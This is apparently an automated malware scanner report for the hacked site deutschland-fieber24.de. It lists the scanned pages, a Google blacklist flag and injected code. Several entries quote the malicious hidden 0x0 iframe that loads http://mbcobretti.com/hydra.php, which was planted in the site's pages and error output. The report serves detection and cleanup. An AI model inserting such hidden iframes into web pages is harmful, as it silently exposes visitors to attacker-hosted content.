New scan:

Malware Scanner report for deutschland-fieber24.de

Malicious/Suspicious/Total urls checked
4/0/6
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "deutschland-fieber24.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
4/0/6
4 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=deutschland-fieber24.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.deutschland-fieber24.de/
200 OK
Content-Length: 30720
Content-Type: text/html
malicious
Page code contains blacklisted domain: mbcobretti.com

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrol
...[4611 bytes skipped]...

Malicious iFrame found. The same iFrame was found in 66 websites.
size: 0x0     
src: http://mbcobretti.com/hydra.php
This URL is marked by Google as suspicious

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter>

http://www.deutschland-fieber24.de/mambots/content/mosthumb/mosthumb.js
404 Not Found
Content-Length: 725
Content-Type: text/html
malicious
Page code contains blacklisted domain: mbcobretti.com

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><br />Error: headers already sent in index.php on line 1.<br />Stopped at line 906 in joomsef.php: HEADERS ALREADY SENT (200)<br />URL=http://www.deutschland-fieber24.de/index.php?option=com_content&task=mosthumb&id=mosthumb.js:<br />OPTION=com_content:

Malicious iFrame found. The same iFrame was found in 66 websites.
size: 0x0     
src: http://mbcobretti.com/hydra.php
This URL is marked by Google as suspicious

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter>

http://www.deutschland-fieber24.de/test404page.js
404 Not Found
Content-Length: 715
Content-Type: text/html
malicious
Page code contains blacklisted domain: mbcobretti.com

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><br />Error: headers already sent in index.php on line 1.<br />Stopped at line 906 in joomsef.php: HEADERS ALREADY SENT (200)<br />URL=http://www.deutschland-fieber24.de/404.htm?mosmsg=FILE+NOT+FOUND%3A+test404page.js:<br />OPTION=com_content:

Malicious iFrame found. The same iFrame was found in 66 websites.
size: 0x0     
src: http://mbcobretti.com/hydra.php
This URL is marked by Google as suspicious

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter>

https://apis.google.com/js/plusone.js
200 OK
Content-Length: 12798
Content-Type: application/javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19495
Content-Type: text/javascript
clean
http://www.deutschland-fieber24.de//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
200 OK
Content-Length: 764
Content-Type: text/html
malicious
Page code contains blacklisted domain: mbcobretti.com

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter></iframe><br />Error: headers already sent in index.php on line 1.<br />Stopped at line 906 in joomsef.php: HEADERS ALREADY SENT (200)<br />URL=http://www.deutschland-fieber24.de/404.htm?mosmsg=FILE+NOT+FOUND%3A+pagead2.googlesyndication.com%2Fpagead%2Fjs%2Fadsbygoogle.js%2F:<br />OPTION=com_content:

Malicious iFrame found. The same iFrame was found in 66 websites.
size: 0x0     
src: http://mbcobretti.com/hydra.php
This URL is marked by Google as suspicious

<iframe src=http://mbcobretti.com/hydra.php frameborder="0" width="0" height="0" scrolling="no" name=counter>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: deutschland-fieber24.de

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: deutschland-fieber24.de
Referer: http://www.google.com/search?q=deutschland-fieber24.de

Result:
The result is similar to the first query. There are no suspicious redirects found.